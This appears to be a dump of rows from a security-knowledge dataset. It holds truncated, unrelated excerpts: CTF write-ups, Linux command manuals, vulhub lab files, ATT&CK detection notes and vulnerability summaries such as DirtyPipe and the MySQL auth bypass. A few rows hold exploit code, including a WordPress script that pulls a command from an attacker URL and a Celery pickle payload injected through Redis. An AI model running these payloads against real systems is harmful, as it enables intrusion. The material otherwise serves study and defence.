text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# Spam&Flags Teaser 2019
Team: c7, shalom, nazywam, akrasuski1, msm, chivay, rev
### Table of contents
* [Secure password DB (crypto)](crypto_ecc) | sec-knowleage |
---
title: 调整输出的信息等级
---
## 调整输出的信息等级
为了方便调试与排错,CF 提供了以下 7 个输出等级:
| 序号 | 等级 | 名称 | 描述 |
| :--: | :---: | :------------: | :--------------------------------: |
| 1 | trace | 追踪 | 最详细的输出等级 |
| 2 | debug | 调试 | 次详细的输出等级 ... | sec-knowleage |
uncompress
===
用来解压.Z文件
## 补充说明
**uncompress命令** 用来解压缩由compress命令压缩后产生的“.Z”压缩包。
### 语法
```shell
uncompress(选项)(参数)
```
### 选项
```shell
-f:不提示用户,强制覆盖掉目标文件;
-c:将结果送到标准输出,无文件被改变;
-r:递归的操作方式。
```
### 参数
文件:指定要压缩的“.Z”压缩包。
### 实例
先创建一个.Z压缩文件
```shell
compress FileName
```
解压:
```shell
uncompress FileName.Z
``` | sec-knowleage |
# InsoBot (misc,network)
note: this writeup was written long after the actual CTF -
the platform was available only on the local on-site network, so some stuff might be a bit vague
### recon
in the description we don't get any files or links, only the info that someone's scanning the network.
after launching wireshark,... | sec-knowleage |
# CyberTank Telework
Network
## Breakout (100 points)
> CyberTank engineers can now work from home! The security team will soon realize shared systems can be hazardous...
>
> URL: https://52.50.31.19/ - You need to register and then use RDWeb to log in. The flag is in the root directory.
>
> Flag format: CTF{32-hex}
... | sec-knowleage |
# The all-seeing eye
Category: Cryptography
## Description
> Remember - reality is an illusion
An image was attached.
## Solution
The attached image looks like some kind of substitution cipher:

We obviously know that the prefix is `cstechnion`. We can see that the `ש` stand for `'c'` and matc... | sec-knowleage |
<!DOCTYPE html>
<html class="client-nojs" lang="nb" dir="ltr">
<head>
<meta charset="UTF-8"/>
<title>Norge – Wikipedia</title>
<script>document.documentElement.className=document.documentElement.className.replace(/(^|\s)client-nojs(\s|$)/,"$1client-js$2");RLCONF={"wgCanonicalNamespace":"","wgCanonicalSpecialPageName":!... | sec-knowleage |
pstree
===
以树状图的方式展现进程之间的派生关系
## 补充说明
**pstree命令** 以树状图的方式展现进程之间的派生关系,显示效果比较直观。
### 语法
```shell
pstree(选项)
```
### 选项
```shell
-a:显示每个程序的完整指令,包含路径,参数或是常驻服务的标示;
-c:不使用精简标示法;
-G:使用VT100终端机的列绘图字符;
-h:列出树状图时,特别标明现在执行的程序;
-H<程序识别码>:此参数的效果和指定"-h"参数类似,但特别标明指定的程序;
-l:采用长列格式显示树状图;
-n:用程序识别码排序。预设是以程序名称来排序;
-p:显示程序识别码;
-u:显示用... | sec-knowleage |
## Private/Local/Comment (PPC, 50+70+100p)
###ENG
[PL](#pl-version)
Set of three tasks where we can execute some Ruby code to steal the flag.
#### Private
First task has code:
```ruby
require_relative 'restrict'
Restrict.set_timeout
class Private
private
public_methods.each do |method|
eval "def #{method.to_s};... | sec-knowleage |
version: '2'
services:
es:
image: vulhub/elasticsearch:1.1.1
ports:
- "9200:9200"
- "9300:9300" | sec-knowleage |
# Holey Beep
PWN
## Description:
> That's it, we have code execution on the fridge. You can already see the /secret_cake_recipe. Wintermuted's TODO list has mentioned that the door alarm on the fridge is sounding all the time. This is usually a sign of the Holey Beep vulnerability. Maybe we finally found a way to get a... | sec-knowleage |
# 通过堆进行信息泄漏
## 什么叫信息泄漏
在CTF中,Pwn题目一般都是运行在远端服务器上的。因此我们不能获知服务器上的libc.so地址、Heap基地址等地址信息,但是在进行利用的时候往往需要这些地址,此时就需要进行信息泄漏。
## 信息泄漏的目标
信息泄漏的目标有哪些?我们可以通过观察内存空间来获知这一点
```
Start End Offset Perm Path
0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/pwn
0x0000000000600000 0... | sec-knowleage |
# 搭建小型域环境
## VMware or Virtualbox
- 在主机上设置具有DHCP服务的网络。
- 启动您在主机上运行的DHCP服务。
- 如果您使用的是ESXI或其他类型的虚拟机管理程序,您可能知道咋整。
## 安装VM
对于本次实验,需要安装一些Windows主机和服务器。可以在[此处](http://windowsiso.net/)获取Windows ISO 并以试用模式运行。除非您想创建有漏洞的计算机,否则`Architechture`,`Service Pack`和补丁级别对于实验环境并不重要。这将在以后添加。Kali Linux可以从他们的官网下载。
将以下镜像安装在VM上:
```
Windows 7
W... | sec-knowleage |
import numpy as np
sbox = [
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x3... | sec-knowleage |
# ODEX文件
## 基本介绍
我们知道 Android 应用程序的 java 层的代码在 apk 文件的 class.dex 文件中。一般情况下,我们在每次启动程序时会从中获取到 dex 文件并进行解析,显然每次都这样做,效率会比较低下。Android 开发者提出了一种方式,即我们最初加载 dex 文件时,就对其进行优化,生成一个 ODEX 文件,存放在 /data/dalvik-cache 目录下。当以后再次运行这个程序时,我们只需要直接加载这个优化过的 ODEX 文件就行了,省去了每次都要优化的时间。对于 Android ROM 中系统自带的 app ,直接转换为 odex 文件,存放在与 apk 相同的目录下,这样,当手机... | sec-knowleage |
# mus1c
General Skills, 300 points
## Description:
> I wrote you a song. Put it in the picoCTF{} flag format
```
Pico's a CTFFFFFFF
my mind is waitin
It's waitin
Put my mind of Pico into This
my flag is not found
put This into my flag
put my flag into Pico
shout Pico
shout Pico
shout Pico
My song's something
put Pico i... | sec-knowleage |
names=[17220, 24, 27220, 38, 48065, 48073, 58073, 68073, 80099, 8034, 97316 ]
ends= [30063, 28, 48063, 13066,48068, 64831, 72088, 80088 ,109822,24013,119733]
bytes=[-1]*119738
for name, end in zip(names,ends):
data=open(str(name),"rb").read()
f=data.find("\r\n\r\n")
data=data[f+4:]
for i, c in enume... | sec-knowleage |
# asm3
Reverse Engineering, 300 points
## Description:
> What does asm3(0xfe8cf7a4,0xf55018af,0xb8c70926) return?
```assembly
asm3:
<+0>: push ebp
<+1>: mov ebp,esp
<+3>: xor eax,eax
<+5>: mov ah,BYTE PTR [ebp+0x9]
<+8>: shl ax,0x10
<+12>: sub al,BYTE PTR [ebp+0xd]
<+15>: add ah,BYTE PTR [ebp... | sec-knowleage |
# Minesweeper (crypto, 350)
> Find which bombs are real and which are duds---without exploding any of them!
> For those wondering why this is cryptography: This technique can be used to
> detect eavesdropping on a quantum channel, without tipping the eavesdroppers
> off.
This time we were given source code of a go simu... | sec-knowleage |
jobs
===
显示作业的状态。
## 概要
```shell
jobs [-lnprs] [jobspec ...]
jobs -x command [args]
```
## 主要用途
- 显示作业的状态。
- 列出活动的作业。
- 列出停止的作业。
## 选项
```shell
-l 在作业信息中额外的列出PID。
-n 只列出最近一次通知以来状态变更的作业。
-p 只列出PID。
-r 只输出处于运行状态的作业。
-s 只输出处于停止状态的作业。
```
## 返回值
返回状态为成功除非给出了非法选项、执行出现错误。
如果使用`jobs -x command [args]`形式执行,那么返回值为`command`的退出状态... | sec-knowleage |
# Puzz-word
Category: Programming, 300 Points
## Description
> One of my colleagues just loves puzzles.
>
> He wrote this API that you can send and get a puzzle, and if you can solve it, you get the secret key to his bitcoin fortune.
>
> We couldn't get it :(
>
> Can you?
## Solution
Let's check the attached servic... | sec-knowleage |
from a2s import A2S
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import hashlib
from uuid import uuid4
key = uuid4().bytes
cipher = A2S(key)
p = []
c = []
for _ in range(3):
plaintext = uuid4().bytes
p.append(plaintext.hex())
ciphertext = cipher.encrypt_block(plaintext)
... | sec-knowleage |
# KasperskyLab Industrial CTF Quals 2017
Team: c7f.m0d3, akrasuski1, nazywam, shalom, rev
### Table of contents
* [Bad computations (crypto)](bad_computations)
* [Security home cameras (crypto)](cameras)
* [Decrypt the message (crypto)](decrypt_message)
* [Smart heater 1 (re/web)](heater_1) | sec-knowleage |
**reDuh简介:**
reDuh是sensepost由2008-07年发布,从本质上讲,可以将JSP/PHP/ASP/ASPX等页面上传到目标服务器,便可以访问该服务器后面的主机。
BlackHat USA 2008介绍:
https://drive.google.com/open?id=1AqmtuBnHQJS-FjVHzJMNNWokda048By-
Github:
https://github.com/sensepost/reDuh
**攻击机:**
192.168.1.5 Debian
192.168.1.4 Windows 7
**靶机:**
192.168.1.119 Windows 2003... | sec-knowleage |
# T1003-006-windows-基于DCsync凭证获取
## 来自ATT&CK的描述
攻击者可能会通过滥用Windows域控制器的应用程序编程接口(API)来访问凭据和其他敏感信息,从而使用称为DCSync的技术来模拟来自远程域控制器的复制过程。
域控制器上的Administrators,Domain Admins和Enterprise Admin组或计算机帐户的成员能够运行DCSync来从Active Directory中提取密码数据,其中可能包括潜在有用帐户(例如KRBTGT和管理员。然后,这些散列又可以用于创建“黄金票证”,以用于“传递票证” 或更改“ 帐户操作”中所述的帐户密码。
DCSync功能已被列入“lsad... | sec-knowleage |
dircolors
===
置ls命令在显示目录或文件时所用的色彩
## 补充说明
**dircolors命令** 设置ls命令在显示目录或文件时所用的色彩。dircolors可根据[色彩配置文件]来设置LS_COLORS环境变量或是显示设置LS_COLORS环境变量的命令。
### 语法
```shell
dircolors(选项)(参数)
```
### 选项
```shell
-b或--sh或--bourne-shell:显示在Boume shell中,将LS_COLORS设为目前预设置的shell指令;
-c或--csh或--c-shell:显示在C shell中,将LS_COLORS设为目前预设置的shell指令;
-... | sec-knowleage |
## HD44780 (embedded, 150p, 40 solves)
> The logic states of the GPIOs have been recorded Figure out the displayed message. You're gonna need this [here](./hd44780.tgz)

### PL
[ENG](#eng-version)
Dostajemy paczkę z sześcioma zdjęciami i sześcioma plikami, które zostały nazwane RSPI_GPIO_23.txt. Na zdjęc... | sec-knowleage |
# ELK监控报警系统-elastalert
[github地址](https://github.com/Yelp/elastalert/)
## elastalert安装
```
# 操作系统:Centos7
# 解决python依赖
yum install epel-release -y
yum install python2-pip.noarch gcc.x86_64 python-devel.x86_64 libffi-devel.x86_64 git.x86_64 -y
pip install --upgrade pip
pip install "setuptools>=11.3"
pip install "elastic... | sec-knowleage |
'\" t
.TH "BUSCTL" "1" "" "systemd 231" "busctl"
.\" -----------------------------------------------------------------
.\" * Define some portability stuff
.\" -----------------------------------------------------------------
.\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.\" http://bugs.debian.or... | sec-knowleage |
version: '2'
services:
server:
image: vulhub/zabbix:3.0.3-server
command: server
depends_on:
- mysql
environment:
- DATABASE_HOST=mysql
- DATABASE_PORT=3306
- DATABASE_USER=root
- DATABASE_PASS=root
- DATABASE_NAME=zabbix
agent:
image: vulhub/zabbix:3.0.3-server
command: age... | sec-knowleage |
openssl
===
强大的安全套接字层密码库
## 补充说明
**OpenSSL** 是一个强大的安全套接字层密码库,囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议,并提供丰富的应用程序供测试或其它目的使用。在OpenSSL被曝出现严重安全漏洞后,发现多数通过SSL协议加密的网站使用名为OpenSSL的开源软件包。由于这是互联网应用最广泛的安全传输方法,被网银、在线支付、电商网站、门户网站、电子邮件等重要网站广泛使用,所以该漏洞影响范围广大。
OpenSSL有两种运行模式:交互模式和批处理模式。
直接输入openssl回车进入交互模式,输入带命令选项的openssl进入批处理模式。
OpenSSL整个软件包大概可以... | sec-knowleage |
# 基础知识
介绍一些 linux kernel pwn 会用到的基础知识,后续会逐渐补充。
主要参考了 [Linux Kernel Exploitation](https://github.com/ctf-wiki/ctf-wiki/blob/master/docs/pwn/linux/kernel/ref/13_lecture.pdf)。
## Kernel
kernel 也是一个程序,用来管理软件发出的数据 I/O 要求,将这些要求转义为指令,交给 CPU 和计算机中的其他组件处理,kernel 是现代操作系统最基本的部分。
kernel 最主要的功能有两点:
1. 控制并与硬件进行交互
2. 提供 application 能... | sec-knowleage |
# TrendMicro Quals 2019
Team: c7, rev, chivay, Eternal, rodbert, des, psrok1, shalom, shizzer
### Table of contents
* [Forensics 100- Knocks](forensics_100)
* [Exploit 300 - Java](exploit_300)
* [Combo 100 - World trip](combo_100)
* [Combo 300 - Git](combo_300)
* [Reversing 100 - Matrioshka](re_100) | sec-knowleage |
## NoSQL injection
## Introduction
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection att... | sec-knowleage |
# docker daemon api 未授权访问漏洞
参考链接:
- http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8
## 漏洞环境
编译及启动漏洞环境:
```
docker compose build
docker compose up -d
```
环境启... | sec-knowleage |
---
title: nbtscan-unixwiz
categories: Information Gathering
tags: [nbtscan-unixwiz,information gathering,netbios,kali linux,recon,enumeration]
date: 2017-04-24 13:34:00
---
0x00 介绍
-------
一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现,但它可在许多地址上运行,而不是仅一个地址。
<!--more-->
[主页][1] | [仓库][2]
- 作者:Ste... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "DROP CONVERSION" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
DROP CONVERSION \- 删除一个用户定义的编码转换
.SH SYNOPSIS
.sp
.nf
DROP CONVERSION \fIname\fR [ CASCADE | RESTRICT ]
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBDROP CONVERSION\fR 删除一个以前定义的编码转换。... | sec-knowleage |
#!/usr/bin/env python
import cgi;
import sys
from html import escape
FLAG = open('/var/www/flag','r').read()
OK_200 = """Content-type: text/html
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
<center>
<title>PyCalx</title>
<h1>PyCalx</h1>
<form>
<input class="for... | sec-knowleage |
import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
ori_str="{\"content-type\": \"application/x-python-serialize\", \"properties\": {\"delivery_tag\": \"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\", \"reply_to\": \"9edb8565-0b59-3389-944e-... | sec-knowleage |
# T1021-002-windows-管理员共享
## 来自ATT&CK的描述
攻击者可以使用服务器帐户阻止(SMB)使用有效帐户与远程网络共享进行交互。然后,攻击者可以以登录用户的身份执行操作。
SMB是同一网络或域上Windows计算机的文件,打印机和串行端口共享协议。攻击者可以使用SMB与文件共享进行交互,从而允许他们在整个网络中横向移动。SMB的Linux和macOS实现通常使用Samba。
Windows系统具有隐藏的网络共享,只有管理员才能访问它们,并提供了远程文件复制和其他管理功能。例如网络共享包括C$,ADMIN$,和IPC$。攻击者可以将此技术与管理员级别的有效帐户结合使用,以通过SMB远程访问网络系统;使用远程... | sec-knowleage |
# 贡献之前
维护 CTF Wiki 对于个人能力没有太多要求,关键是喜欢开源,愿意花时间做,把自己的所学与他人分享。
在维护 CTF Wiki 的过程中,没有任何指派性的任务,想写什么就写什么,觉得 Wiki 哪里写的不好就完善哪里。
如果觉得之前的人写得不好,可以与其讨论,将其打造为更为合理的结构。
**请务必在看完本章节所有内容后再开始贡献。** | sec-knowleage |
# Binary Gauntlet 0
Category: Binary Exploitation, 10 points
## Description
> This series of problems has to do with binary protections and how they affect a very simple program. How far can you make it in the gauntlet?
A binary file was attached.
## Solution
Let's run `checksec` on the file:
```console
┌──(user@kali)-... | sec-knowleage |
# IAI Challenge 2022 - החידה הטכנולוגית של התעשייה האווירית 2022
## Introduction
The IAI published a technological challenge. It contained two riddles. We'll review the solutions here.
[](https://www.youtube.com/watch?v=kSQiOpd5CB8)
## Solution
### Riddle #1
The narrator introduces [Celestial Navig... | sec-knowleage |
.TH smbsh 1 Samba "23 Oct 1998"
.SH NAME
.B smbsh - 允许用UNIX命令访问NT文件系统
.SH 总览
.B smbsh
.SH 描述
此程序是\fBSamba\fR套件的一部分。
\fBsmbsh\fR允许你用UNIX命令诸如\fBls\fR,\fBegrep\fR和\fBrcp\fR等来访问NT文件系统。必须用动态链接的shell以便使\fBsmbsh\fR工作正常。
从命令提示上执行\fBsmbsh\fR命令,并输入用户账号和口令以便在NT操作系统中验证你的身份。
.nf
system% smbsh
Username: user
Password:
.fi
从shell... | sec-knowleage |
---
title: CVE-2022-0847
---
<center><h1>CVE-2022-0847</h1><b>本文作者:一生热爱</b><br><br></center>
---
## 一、简述
CVE-2022-0847-DirtyPipe-Exploit 是存在于 Linux 内核 5.8 及之后版本中的本地提权漏洞。
攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root
CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为 `Dirty Pipe`
## 二、影响版本
高于 5... | sec-knowleage |
# Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
受影响版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
参考链接:
- http://www.freebuf.com/vuls/3815.htm... | sec-knowleage |
# PWN
---
**相关工具**
- pwntools
```bash
如何验证 pwntools 安装成功
python 进入交互,导入 pwn 库,出现如下字符证明 pwntools 安装成功
python3
>>> from pwn import *
>>> asm("xor eax,eax")
b'1\xc0'
```
- [pwndbg/pwndbg](https://github.com/pwndbg/pwndbg)
```
git clone https://github.com/pwndbg/pwndbg.git
cd pwn... | sec-knowleage |
<!--
~ Licensed to the Apache Software Foundation (ASF) under one
~ or more contributor license agreements. See the NOTICE file
~ distributed with this work for additional information
~ regarding copyright ownership. The ASF licenses this file
~ to you under the Apache License, Version 2.0 (the
~ "License... | sec-knowleage |
# T1558-003-windows-基于SPN凭证获取
## 来自ATT&CK的描述
攻击者可能滥用有效的Kerberos票证授予票证(TGT)或嗅探网络流量以获得可能容易受到暴力攻击的票证授予服务(TGS)票证。
服务主体名称(SPN)用于唯一标识Windows服务的每个实例。为了启用身份验证,Kerberos要求SPN与至少一个服务登录帐户(专门负责运行服务[3]的帐户)相关联。
拥有有效的Kerberos票证授予票证(TGT)的攻击者可以向域控制器(DC)请求任何SPN的一个或多个Kerberos票证授予服务(TGS)服务票证。以使用RC4算法对这些票证的一部分进行加密,这意味着与SPN相关联的服务帐户的Kerberos ... | sec-knowleage |
.ig \"-*- nroff -*-
Copyright (C) 1989-1999 Free Software Foundation, Inc.
Permission is granted to make and distribute verbatim copies of
this manual provided the copyright notice and this permission notice
are preserved on all copies.
Permission is granted to copy and distribute modified versions of this
manual under... | sec-knowleage |
# Writeup Tokyo Westerns CTF 2017
Team: c7f.m0d3, shalom, akrasuski1, nazywam, psrok1, cr019283, msm
### Table of contents
* [My simple cipher (crypto)](crypto_simple)
* [Freshen uploader (web)](web_uploader)
* [Baby RSA (crypto)](crypto_rsa)
* [Private Local Comment (ppc)](ppc_plc)
* [Baby DLP (crypto)](crypto_dlp)
* ... | sec-knowleage |
#!/usr/bin/env python
from flask import Flask, render_template, Response
from flask_sockets import Sockets
import json
import MySQLdb
app = Flask(__name__)
sockets = Sockets(app)
with open("config.json") as f:
connect_params = json.load(f)
connect_params["db"] = "ganbatte"
# Use Shift-JIS for everything so it use... | sec-knowleage |
ntpdate
===
使用网络计时协议(NTP)设置日期和时间
## 补充说明
**ntpdate命令** 是用来设置本地日期和时间。它从指定的每个服务器获得了一些样本,并应用标准 NTP 时钟过滤器和选择算法来选择最好的样本。
此 ntpdate 命令使用以下方法进行时间调整:
* 如果它确定时钟偏差超过 0.5 秒,它通过调用 settimeofday 子例程设置时钟时间。在引导时间,这是一个首选的方法。
* 如 果它确定时钟偏差小于 0.5 秒,它通过调用 adjtime 子例程和偏移量来调整时钟时间。此方法倾向于用牺牲一些稳定性来保持漂移时钟更加准确。 当不是通过运行一个守护程序而是从 cron 命令有规则的运行n... | sec-knowleage |
# ALPC bug 0day
https://github.com/SandboxEscaper/randomrepo/blob/master/PoCLPE.rar
https://www.theregister.co.uk/2018/08/28/windows_0day_pops_up_out_of_span_classstrikenowherespan_twitter/
## 用法
@sandboxescaper8月28号在推特上发布了Windows的本地版权0day,然后被很快的撤回。PoC在Github上。然后我验证了一下是不是真的,确实如此。
- 以管理员身份打开Process Explorer - 右键单击“以管理... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH LN 1 2022年9月 "GNU coreutils 9.1" ... | sec-knowleage |
# 剑指 Offer 题解
## 前言
题目来自《何海涛. 剑指 Offer[M]. 电子工业出版社, 2012.》,刷题网站推荐:
- [牛客网](https://www.nowcoder.com/ta/coding-interviews?from=cyc_github)
- [Leetcode](https://leetcode-cn.com/problemset/lcof/)
## 数组与矩阵
- [3. 数组中重复的数字](3.%20数组中重复的数字.md)
- [4. 二维数组中的查找](4.%20二维数组中的查找.md)
- [5. 替换空格](5.%20替换空格.md)
- [29. 顺时针打印矩阵](29.%20顺时... | sec-knowleage |
# T1220-win-XSL Script Processing
## 来自ATT&CK的描述
Extensible Stylesheet Language (XSL)是用来描述和渲染XML文件的。为了进行复杂的操作,XSL增加了不同的语言。红队可以使用它来运行二进制代码绕过白名单的检查。和Trusted Developer Utilities相似,msxsl.exe可以在本地或者远程运行JavaScript,虽然msxsl.exe不是默认安装了,但是红队可以打包它并放在客户端。msxsl.exe运行时接收两个参数,XML源文件和XSL stylesheet。既然xsl文件也是一个xml,红队可以使用xsl文件两次,当msxsl.... | sec-knowleage |
# Multiplicater (web, 457p, 10 solved)
In the challenge we get access to a [cgi script](index.cgi).
The script is not very complex:
- It sets the variables var1 and var2 to be integer (yes, bash can have types variables!)
- It reads POST parameters we send via HTTP form, splits them with `awk` to extract the values
- T... | sec-knowleage |
version: '2'
services:
redis:
image: redis
ports:
- 6379:6379
celery:
image: vulhub/celery:3.1.23
volumes:
- .:/home/user
command: "celery -A tasks worker -l debug"
links:
- redis
environment:
CELERY_BROKER_URL: redis://redis/0 | sec-knowleage |
#!/usr/bin/env python3
import requests
import sys
# wordpress's url
target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1]
# Put your command in a website, and use the website's url
# don't contains "http://", must be all lowercase
shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2]
# an e... | sec-knowleage |
<?php
session_start();
function get_question(){
$answer = array();
foreach(file("xxxxxxxxx") as $line) {
array_push($answer, trim($line));
}
$random_index = rand(0, 999);
$question = file_get_contents("xxxxxxxx/$random_index");
$_SESSION['quesans'] = $answer[$random_index];
return $question;
}
function ba... | sec-knowleage |
# Dragon CTF 2020
### Table of contents
* [CoolNAME Checker (misc)](coolname_checker)
* [babyshell (misc)](babyshell)
* [Harmony Chat (web)](harmony_chat) | sec-knowleage |
# 创建命令
---
- https://www.kancloud.cn/imxieke/ruby-base/107289
---
来实际体验一下如何用 Ruby 实现 Unix 的 grep 命令,以便大家了解用 Ruby 编写程序的大概流程。
# 命令行的输入数据
到目前为止,我们写的程序都是向屏幕输出数据。现在我们考虑一下怎么输入数据。在创建命令前,我们首先得知道怎么使用命令。那么,让我们先来看看怎么把数据传递给程序。
向程序传递数据,最简单的方法就是使用命令行。Ruby 程序中,使用 `ARGV` 这个 Ruby 预定义好的数组来获取从命令行传递过来的数据。数组 `ARGV` 中的元素,就是在命令行中指定的脚本 字符串参数。... | sec-knowleage |
# 磁盘取证
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**简介**
一般来说取证就是收集并分析证据,并为司法行动中的展示构建事实的一个过程。但在计算机技术中,或在计算机取证技术中,取证就是通过专门的技术来发现证据的过程,这些证据可被用于确认计算机、计算机网络、相关设备、数据存储媒体是否被用于实施犯罪或未授权的活动。在计算机的取证领域中,取证人员在取证调查的整个过程中证明证据媒体没有在任何方面被篡改是至关重要的。其中一种方法是对原始的证据媒体作一个映象复制,并对映象复制品展开调查,以防止对原始证据的任何更改。
**相关文章**
- [Li... | sec-knowleage |
### .strtab: String Table介绍
该节区描述默认的字符串表,包含了一系列的以 NULL 结尾的字符串。ELF 文件使用这些字符串来存储程序中的符号名,包括
- 变量名
- 函数名
该节在运行的过程中不需要加载,只需要加载对应的子集 .dynstr 节。
一般通过对字符串的首个字母在字符串表中的下标来索引字符串。
字符串表的首尾字节都是NULL。此外,索引为 0 的字符串要么没有名字,要么就是名字为空,其解释依赖于上下文。字符串表也可以为空,相应的,其节区头部的 sh_size 成员将为 0。在空字符串表中索引大于 0 的下标显然是非法的。
一个节区头部的 sh_name 成员的值为其相应的节区头部字符串... | sec-knowleage |
# Message of the Day
PWN
## Description:
> From the OffHub router, you jump onto the Google-Haus smart hub. This fully feature assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available... | sec-knowleage |
vgextend
===
向卷组中添加物理卷
## 补充说明
**vgextend命令** 用于动态扩展LVM卷组,它通过向卷组中添加物理卷来增加卷组的容量。LVM卷组中的物理卷可以在使用vgcreate命令创建卷组时添加,也可以使用vgextend命令动态的添加。
### 语法
```shell
vgextend(选项)(参数)
```
### 选项
```shell
-d:调试模式;
-t:仅测试。
```
### 参数
* 卷组:指定要操作的卷组名称;
* 物理卷列表:指定要添加到卷组中的物理卷列表。
### 实例
使用vgextend命令向卷组"vg2000"中添加物理卷。在命令行中输入下面的命令:
```s... | sec-knowleage |
# Tupper needs help
Misc., 5 points
## Description
> I forgot the size of my kipod, can you help? k = 11490880361187481530435770138200724088859490205638172476434160974276094547843164804389357653548432255480411923629893417411005734900734481569855039830594330074566218690885285416015310218054346411580228633216043659123308... | sec-knowleage |
# Hastad (crypto 400)
###ENG
[PL](#pl-version)
In the task we get the same unpadded message encrypted via RSA using 3 different public keys, but with the same exponent `e = 3`.
This means we can utilize Hastad Broadcast Attack here to recover the message thanks to Chinese Reminder Theorem.
The public exponent is 3 in a... | sec-knowleage |
### Unsorted Bin Attack概述
Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。
Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。
Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值。
### Unsorted Bin基本来源
1. 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。
2. 释放一个不属于 fast bin 的 chunk,并且该 chunk 不... | sec-knowleage |
## Neo (Crypto, 200p)
###ENG
[PL](#pl-version)
The task shows a webpage with Neo going to Oracle.
There is a html form with some base64 encoded data.
Decoding gives some random 80 bytes blob.
Once every few seconds the data changes, most likely there is embedded timestamp.
If we provide our own base64 data in the form ... | sec-knowleage |
# 计算机操作系统 - 设备管理
<!-- GFM-TOC -->
* [计算机操作系统 - 设备管理](#计算机操作系统---设备管理)
* [磁盘结构](#磁盘结构)
* [磁盘调度算法](#磁盘调度算法)
* [1. 先来先服务](#1-先来先服务)
* [2. 最短寻道时间优先](#2-最短寻道时间优先)
* [3. 电梯算法](#3-电梯算法)
<!-- GFM-TOC -->
## 磁盘结构
- 盘面(Platter):一个磁盘有多个盘面;
- 磁道(Track):盘面上的圆形带状区域,一个盘面可以有多个磁道;
- 扇区(Track Sector):磁道上的... | sec-knowleage |
# DNS
> 注 : 笔记中拓扑图 drawio 源文件在其图片目录下
---
## 什么是 DNS
DNS(Domain Name System,域名管理系统) 是因特网的重要基础。它建立在一个分布式数据库基础之上,在这个数据库里,保存了 IP 地址和域名的相互映射关系。
**常用的DNS记录**
- A ip 地址记录,记录域名对应的 ip 地址
- AAAA ipv6 地址记录,记录域名对应的 ipv6 地址
- CNAME 别名记录,记录一个主机的别名
- MX 邮件交换记录,记录一个邮件域名对应的 ip 地址
- NS 域名服务器记录,记录该域名由哪台域名服务器解析
- PTR 反向记录,即从 ... | sec-knowleage |
---
title: SET
categories: Information Gathering
tags: [information gathering,SET,kali linux]
date: 2020-07-13 11:00:23
---
SET包介绍
----------
Social-Engineer Toolkit是专为社会工程(Social-Engineering)设计的开源渗透测试框架。SET具有许多自定义的攻击向量,使你可以在短时间内进行可信的攻击。
工具来源: https://github.com/trustedsec/social-engineer-toolkit/
[SET主页][1] | [Kal... | sec-knowleage |
# 协议分析概述
网络协议为计算机网络中进行数据交换而建立的规则、标准或约定的集合。例如,网络中一个微机用户和一个大型主机的操作员进行通信,由于这两个数据终端所用字符集不同,因此操作员所输入的命令彼此不认识。为了能进行通信,规定每个终端都要将各自字符集中的字符先变换为标准字符集的字符后,才进入网络传送,到达目的终端之后,再变换为该终端字符集的字符。当然,对于不相容终端,除了需变换字符集字符外还需转换其他特性,如显示格式、行长、行数、屏幕滚动方式等也需作相应的变换。
